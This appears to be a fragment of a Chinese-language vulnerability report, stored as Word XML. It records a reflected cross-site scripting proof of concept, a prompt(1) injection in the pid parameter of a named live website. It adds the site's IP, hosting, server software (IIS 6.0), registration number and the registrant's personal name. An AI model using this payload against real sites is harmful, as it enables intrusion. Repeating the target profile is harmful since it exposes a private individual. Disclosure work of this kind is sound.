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注入网址:http://xhc001.qy01.cn/main1.asp?pid=6&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞参数:pid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http://xhc001.qy01.cn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湖南长沙唯民网络科技有限公司</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>IP__坐标  河南省郑州市 景安BGP数据中心</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>所属__IP  122.114.86.202</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站年龄  12年7月8天（创建于2006年09月25日,过期时间为2019年09月25日)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案编号  陕ICP备13001819号-12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案性质  个人</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案名称  王自力</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案时间  2017/4/21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Microsoft-IIS/6.0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http://xhc001.qy01.cn/main1.asp?pid=6&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script&gt;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